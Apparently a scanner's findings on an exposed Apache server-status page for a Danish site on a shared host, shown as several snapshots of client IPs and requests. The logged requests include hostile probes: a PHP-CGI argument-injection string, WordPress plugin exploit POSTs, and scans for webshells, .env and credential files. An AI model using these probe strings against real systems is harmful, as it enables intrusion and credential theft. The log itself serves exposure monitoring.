"_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0457620/8/8_ 0.00100.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /about.php HTTP/1.0 1-0457630/7/7_ 0.00100.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-2019.php HTTP/1.0 2-0457650/5/5_ 0.00200.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /users.php HTTP/1.0 3-0457660/5/5_ 0.00200.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /randkeyword.php HTTP/1.0 4-0457670/6/6_ 0.00000.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/plugins/wp-catcher/admin.php HTTP/1.0 5-0457680/5/5_ 0.00300.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/plugins/wp-config.php HTTP/1.0 6-0457690/5/5W 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkGET /server-status HTTP/1.0 7-0457700/6/6_ 0.00000.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/plugins/wp-catcher/cong.php HTTP/1.0 8-0457710/6/6_ 0.00000.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /images/wp-login.php HTTP/1.0 9-0457720/6/6_ 0.01060.00.000.00 64.226.65.160webhotel5.webhosting.dkGET / HTTP/1.0 10-0457730/6/6_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 11-0457740/5/5_ 0.00100.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/plugins/include.php HTTP/1.0 12-0457750/5/5_ 0.00300.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /post-new.php HTTP/1.0 13-0457760/5/5_ 0.00300.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 14-0457770/5/5_ 0.00300.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /options-general.php HTTP/1.0 15-0457780/5/5_ 0.00300.00.000.00 52.167.144.18webhotel5.webhosting.dkGET /sitemap.xml.gz HTTP/1.0 16-0457790/6/6_ 0.01300.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /options-discussion.php HTTP/1.0 17-0457800/4/4_ 0.00300.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /menu.php HTTP/1.0 18-0457810/5/5_ 0.00200.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /credits.php HTTP/1.0 19-0457820/5/5_ 0.00200.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /user-new.php HTTP/1.0 20-0459130/5/5_ 0.00000.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/uploads/duck.php HTTP/1.0 21-0460310/4/4_ 0.00200.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-links.php HTTP/1.0 22-0460320/4/4_ 0.00200.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-crom.php HTTP/1.0 23-0461590/4/4_ 0.00100.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-includes/pomo/about.php HTTP/1.0 24-0461600/4/4_ 0.00100.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /install.php HTTP/1.0 25-0461610/4/4_ 0.00160.00.000.00 64.226.65.160webhotel5.webhosting.dkGET / HTTP/1.0 26-0461630/4/4_ 0.00100.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-includes/certificates/wp.php HTTP/1.0 27-0462930/4/4_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkGET /server HTTP/1.0 28-0462940/4/4_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 29-0462950/4/4_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkGET /about HTTP/1.0 30-0462960/4/4_ 0.00000.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/plugins/seoo/alfanew.php HTTP/1.0 31-0462970/4/4_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 32-0462990/4/4_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 33-0463000/4/4_ 0.00000.00.000.00 62.146.234.214webhotel5.webhosting.dkGET /wp-content/themes/pridmag/byp.php HTTP/1.0 34-0463010/4/4_ 0.00000.00.000.00 64.226.65.160webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde316486e3f
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 02-Jul-2024 18:44:48 CEST Restart Time: Tuesday, 02-Jul-2024 04:00:05 CEST Parent Server Generation: 14 Server uptime: 14 hours 44 minutes 42 seconds Total accesses: 58132 - Total Traffic: 145.1 MB CPU Usage: u.83 s.42 cu0 cs0 - .00235% CPU load 1.1 requests/sec - 2867 B/second - 2618 B/request 1 requests currently being processed, 29 idle workers _W___________________.._______.__............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-14391050/1/1851_ 0.004000.00.006.18 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-14388780/1/1851W 0.00000.00.004.77 164.90.228.79webhotel5.webhosting.dkGET /server-status HTTP/1.0 2-14388790/1/1731_ 0.004910.00.002.24 111.119.215.223webhotel5.webhosting.dkGET /index-0-danish.html HTTP/1.0 3-14388150/2/1851_ 0.001900.00.002.98 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-14394190/1/1771_ 0.001000.00.003.19 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-14388670/2/1844_ 0.00000.00.004.11 164.90.228.79webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 6-14387810/2/1745_ 0.002530.00.002.51 147.185.132.81webhotel5.webhosting.dkGET / HTTP/1.0 7-14387780/2/1843_ 0.003100.00.002.31 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-14391510/1/1769_ 0.003810.00.003.70 81.19.232.105webhotel5.webhosting.dk/ext.php?u=https://xnxxcom.club/se/?query%3Dreule%2034 HTTP/1.0 9-14391520/1/1841_ 0.003710.00.002.81 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-14387820/2/1768_ 0.0024140.00.004.16 66.220.149.23www.lillekrabbe.dkGET /lab/doll_s/adopted/apitchou_lulusirene.gif HTTP/1.0 11-14388220/2/1671_ 0.00370.00.002.83 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 12-14388310/2/1843_ 0.00140.00.003.88 164.90.228.79webhotel5.webhosting.dkGET / HTTP/1.0 13-14388320/2/1769_ 0.00000.00.004.09 185.211.58.226webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 14-14392240/1/1769_ 0.002910.00.007.74 81.19.232.105webhotel5.webhosting.dkimages/thumbs/films/23751/350x233_thumb-Scene7-004.jpg HTTP/1.0 15-14394650/1/1716_ 0.00040.00.003.95 164.90.228.79webhotel5.webhosting.dkGET / HTTP/1.0 16-14394670/1/1733_ 0.00020.00.002.51 164.90.228.79webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 17-14394680/1/1710_ 0.00010.00.004.70 164.90.228.79webhotel5.webhosting.dkGET /server HTTP/1.0 18-14394790/1/1704_ 0.00000.00.005.92 164.90.228.79webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 19-14394800/1/1708_ 0.00010.00.001.90 164.90.228.79webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 20-14394810/1/1724_ 0.00010.00.005.92 164.90.228.79webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 21-14-0/0/1720. 0.086000.00.005.29 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-14-0/0/1593. 0.10000.00.002.68 164.90.228.79webhotel5.webhosting.dkGET /about HTTP/1.0 23-14393470/1/1677_ 0.002700.00.002.48 75.74.123.212webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 24-14373040/6/1646_ 0.0139430.00.005.89 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 25-14389020/1/1577_ 0.004810.00.001.31 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-14393460/1/1513_ 0.002800.00.003.88 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-14389030/1/1456_ 0.0048180.00.007.54 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 28-14389040/1/1488_ 0.004800.00.003.62 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-14393480/1/1443_ 0.002600.00.006.13 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-14-0/0/1281. 0.099800.00.005.27 157.245.155.233webhotel5.webhosting.dkGET /assets/filemanager/dialog.php HTTP/1.0 31-14387830/2/1147_ 0.002010.00.003.43 78.138.56.226webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 32-14389050/1/829_ 0.0047790.00.002.94 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 33-13-0/0/798. 0.07393000.00.004.21 136.144.33.91webhotel5.webhosting.dkGET /sindex.php HTTP/1.0 34-13-0/0/663. 0.09392800.00.002.06 136.144.33.91webhotel5.webhosting.dkGET /wp-admin/xmrlpc.php HTTP/1.0 35-13-0/0/462. 0.07392700.00.001.89 136.144.33.91webhotel5.webhosting.dkGET /wp-includes/css/modules.php HTTP/1.0 36-13-0/0/334. 0.07392640.00.002.14 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 37-13-0/0/283. 0.08392600.00.001.69 216.173.67.179webhotel5.webhosting.dkGET /.env HTTP/1.0 38-11-0/0/221. 0.061157500.00.000.07 138.199.54.52webhotel5.webhosting.dkGET /nice.php?p= HTTP/1.0 39-11-0/0/170. 0.061157510.00.000.05 138.199.54.52webhotel5.webhosting.dkGET /.well-known/pki-validation/ws.php HTTP/1.0 40-11-0/0/170. 0.061157500.00.000.04 138.199.54.52webhotel5.webhosting.dkGET /wp-includes/SimplePie/cl.php HTTP/1.0 41-11-0/0/120. 0.061157500.00.000.05 138.199.54.52webhotel5.webhosting.dkGET /wp-admin/wso112233.php HTTP/1.0 42-7-0/0/70. 0.062692400.00.000.02 81.19.232.105webhotel5.webhosting.dkGET /%C0 HTTP/1.0 43-7-0/0/70. 0.062692440.00.000.02 51.15.83.171webhotel5.webhosting.dkGET / HTTP/1.0 44-7-0/0/70. 0.082692430.00.000.02 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 45-7-0/0/70. 0.072692400.00.000.02 51.15.83.171webhotel5.webhosting.dkGET /x HTTP/1.0 46-7-0/0/49. 0.082692300.00.000.01 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde398f7fc40
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 30-Jun-2024 11:07:01 CEST Restart Time: Sunday, 30-Jun-2024 06:05:04 CEST Parent Server Generation: 5 Server uptime: 5 hours 1 minute 57 seconds Total accesses: 17788 - Total Traffic: 9.5 MB CPU Usage: u.41 s.1 cu0 cs0 - .00282% CPU load .982 requests/sec - 547 B/second - 557 B/request 1 requests currently being processed, 30 idle workers ______________________________W................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5142640/10/589_ 0.01500.00.000.17 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 1-5143030/9/582_ 0.001200.00.000.22 45.33.31.94webhotel5.webhosting.dkHEAD /home HTTP/1.0 2-5142780/9/567_ 0.011300.00.010.43 45.33.31.94webhotel5.webhosting.dkHEAD /wp HTTP/1.0 3-5142620/10/574_ 0.01000.00.010.32 164.90.228.79webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 4-5142650/9/569_ 0.012100.00.000.30 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-5142800/9/568_ 0.012000.00.000.38 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-5142660/11/570_ 0.011300.00.000.36 45.33.31.94webhotel5.webhosting.dkHEAD /old HTTP/1.0 7-5142790/9/565_ 0.011300.00.000.23 45.33.31.94webhotel5.webhosting.dkHEAD /bk HTTP/1.0 8-5143300/9/565_ 0.02030.00.000.34 164.90.228.79webhotel5.webhosting.dkGET / HTTP/1.0 9-5143570/9/566_ 0.01000.00.000.22 164.90.228.79webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 10-5142670/9/568_ 0.012400.00.000.22 45.33.31.94webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 11-5144150/9/566_ 0.01000.00.000.27 164.90.228.79webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-5142680/10/568_ 0.001300.00.000.28 45.33.31.94webhotel5.webhosting.dkHEAD /main HTTP/1.0 13-5142690/10/569_ 0.00200.00.000.27 31.148.174.80webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 14-5144350/9/563_ 0.01000.00.000.17 164.90.228.79webhotel5.webhosting.dkGET /about HTTP/1.0 15-5142700/10/567_ 0.013000.00.001.41 189.45.240.164webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 16-5142710/10/568_ 0.02130.00.000.21 164.90.228.79webhotel5.webhosting.dkGET / HTTP/1.0 17-5144560/9/565_ 0.01000.00.000.20 164.90.228.79webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 18-5144760/8/565_ 0.013800.00.000.16 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-5145020/8/564_ 0.013100.00.000.20 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-5145310/8/564_ 0.013000.00.000.40 40.77.167.24webhotel5.webhosting.dkGET /sitemap.xml HTTP/1.0 21-5145530/8/564_ 0.012200.00.000.23 52.167.144.181webhotel5.webhosting.dkGET /sitemap_index.xml HTTP/1.0 22-5155770/6/551_ 0.001300.00.000.24 45.33.31.94webhotel5.webhosting.dkHEAD /backup HTTP/1.0 23-5142610/9/521_ 0.0223470.00.000.20 45.33.31.94webhotel5.webhosting.dkHEAD / HTTP/1.0 24-5142630/10/515_ 0.011300.00.000.16 45.33.31.94webhotel5.webhosting.dkHEAD /new HTTP/1.0 25-5142720/10/510_ 0.0110510.00.010.21 216.245.221.87webhotel5.webhosting.dkHEAD / HTTP/1.0 26-5142730/10/483_ 0.01000.00.000.14 164.90.228.79webhotel5.webhosting.dkGET /server HTTP/1.0 27-5142740/9/521_ 0.001300.00.000.41 45.33.31.94webhotel5.webhosting.dkHEAD /bc HTTP/1.0 28-5142750/10/451_ 0.00000.00.010.14 164.90.228.79webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 29-5142760/9/396_ 0.011630.00.000.36 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 30-5142770/9/396W 0.00000.00.000.22 164.90.228.79webhotel5.webhosting.dkGET /server-status HTTP/1.0 31-4-0/0/318. 0.0141600.00.000.09 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 32-4-0/0/270. 0.0995200.00.000.14 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-4-0/0/200. 0.0695200.00.000.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-4-0/0/150. 0.0895200.00.000.07 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b7ab2564
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 28-Jun-2024 14:25:31 CEST Restart Time: Friday, 28-Jun-2024 04:00:05 CEST Parent Server Generation: 10 Server uptime: 10 hours 25 minutes 25 seconds Total accesses: 43751 - Total Traffic: 34.0 MB CPU Usage: u2.03 s.89 cu0 cs0 - .00778% CPU load 1.17 requests/sec - 948 B/second - 813 B/request 1 requests currently being processed, 30 idle workers ____________________W________....__............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-106310/40/1377_ 0.073910.00.020.86 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 1-106180/40/1403_ 0.07000.00.020.62 139.59.143.102webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 2-106270/40/1357_ 0.071200.00.030.62 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-106170/41/1337_ 0.074120.00.040.78 17.241.75.207webhotel5.webhosting.dkGET / HTTP/1.0 4-106320/40/1230_ 0.05300.00.050.80 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-106200/40/1335_ 0.0621930.00.022.43 66.249.70.192www.valloe.orgGET /motor/spa0205.htm HTTP/1.0 6-106150/45/1366_ 0.055700.00.050.95 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-106360/40/1310_ 0.05000.00.030.58 139.59.143.102webhotel5.webhosting.dkGET /about HTTP/1.0 8-106240/40/1336_ 0.073320.00.021.18 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 9-106250/41/1286_ 0.04000.00.030.47 139.59.143.102webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 10-106260/40/1338_ 0.054000.00.020.81 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-106600/40/1241_ 0.05000.00.020.87 139.59.143.102webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-106280/40/1304_ 0.07700.00.020.63 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-106290/40/1219_ 0.06600.00.022.77 51.255.49.38webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 14-106300/40/1202_ 0.062000.00.021.39 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-106330/40/1209_ 0.064000.00.040.74 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-106340/41/1156_ 0.07000.00.040.68 139.59.143.102webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 17-106700/39/1254_ 0.04030.00.030.65 139.59.143.102webhotel5.webhosting.dkGET / HTTP/1.0 18-106710/40/1296_ 0.07150.00.060.81 139.59.143.102webhotel5.webhosting.dkGET / HTTP/1.0 19-107030/40/1223_ 0.04000.00.030.66 139.59.143.102webhotel5.webhosting.dkGET /server HTTP/1.0 20-107060/39/1253W 0.06000.00.032.28 139.59.143.102webhotel5.webhosting.dkGET /server-status HTTP/1.0 21-107150/39/1156_ 0.065500.00.031.00 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-107260/39/1172_ 0.075700.00.031.12 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 23-107480/39/1129_ 0.066520.00.040.64 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 24-107510/39/1081_ 0.074000.00.030.54 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-106160/43/1024_ 0.06000.00.032.36 139.59.143.102webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 26-106190/41/1045_ 0.07550.00.070.61 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 27-106210/40/1014_ 0.06200.00.030.43 82.223.107.61webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 28-1064190/29/995_ 0.034000.00.020.54 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-9-0/0/965. 0.06152300.00.000.42 114.119.145.110webhotel5.webhosting.dk66eea3-aab0-4a89-81b1-2ac232983676/ooProofPageHalf.jpg HTTP/1.0 30-9-0/0/949. 0.05152300.00.000.51 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-9-0/0/905. 0.09295100.00.000.51 103.98.214.96webhotel5.webhosting.dkGET /wp-includes/SimplePie/Decode/HTML/ HTTP/1.0 32-9-0/0/821. 0.06295200.00.000.45 103.98.214.96webhotel5.webhosting.dkGET /wp-includes/SimplePie/Decode/HTML/ HTTP/1.0 33-106220/40/844_ 0.074000.00.160.51 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-106230/39/710_ 0.064100.00.030.44 17.241.75.207webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 35-8-0/0/501. 0.08511600.00.000.27 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-8-0/0/432. 0.07511600.00.001.16 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-8-0/0/331. 0.06511600.00.000.18 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-8-0/0/332. 0.06511600.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-8-0/0/332. 0.07511600.00.000.12 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-8-0/0/201. 0.06511600.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-8-0/0/201. 0.06511600.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-8-0/0/201. 0.06511600.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-8-0/0/135. 0.06511600.00.000.09 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-8-0/0/93. 0.07511600.00.000.06 217.113.194.38webhotel5.webhosting.dker&publicationName=tfs&issueName=Issue2015_01&page=107 HTTP/1.0 45-0-0/0/50. 0.063425700.00.000.01 193.176.211.32webhotel5.webhosting.dkGET /images/uploads/ HTTP/1.0 46-0-0/0/50. 0.063425600.00.000.01 193.176.211.32webhotel5.webhosting.dkGET /wp-content/uploads/wp-content/uploads/ HTTP/1.0 47-0-0/0/50. 0.053425700.00.000.02 52.230.152.48webhotel5.webhosting.dk=grakom&publicationName=arr2017&issueName=Issue_091117 HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Ap
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3ad94972c
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 26-Jun-2024 14:03:52 CEST Restart Time: Wednesday, 26-Jun-2024 06:05:04 CEST Parent Server Generation: 8 Server uptime: 7 hours 58 minutes 48 seconds Total accesses: 33640 - Total Traffic: 24.0 MB CPU Usage: u.77 s.29 cu0 cs0 - .00369% CPU load 1.17 requests/sec - 876 B/second - 748 B/request 1 requests currently being processed, 30 idle workers _____________________...._W____.____............................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-8343260/5/982_ 0.01030.00.000.40 138.68.144.227webhotel5.webhosting.dkGET / HTTP/1.0 1-8343120/8/1036_ 0.01000.00.000.51 138.68.144.227webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 2-8343270/5/1033_ 0.00000.00.000.81 138.68.144.227webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 3-8343500/4/1002_ 0.013940.00.000.43 92.204.40.4webhotel5.webhosting.dkGET / HTTP/1.0 4-8343140/6/1035_ 0.00000.00.000.60 138.68.144.227webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 5-8343150/5/1032_ 0.003500.00.001.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-8343160/5/1001_ 0.012800.00.001.92 185.172.52.85webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-8343280/5/1001_ 0.00000.00.000.83 138.68.144.227webhotel5.webhosting.dkGET /server HTTP/1.0 8-8343170/5/1003_ 0.001800.00.000.55 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-8343540/4/950_ 0.001300.00.000.47 114.119.148.187webhotel5.webhosting.dkimages/thumbs/films/22480/350x233_thumb-Scene2-005.jpg HTTP/1.0 10-8343580/4/949_ 0.001100.00.000.56 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-8343180/5/890_ 0.011270.00.000.40 145.220.91.19webhotel5.webhosting.dkGET / HTTP/1.0 12-8343290/5/932_ 0.01000.00.000.34 138.68.144.227webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 13-8343660/4/897_ 0.001000.00.001.24 51.222.253.13webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 14-8343790/4/949_ 0.00900.00.000.44 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 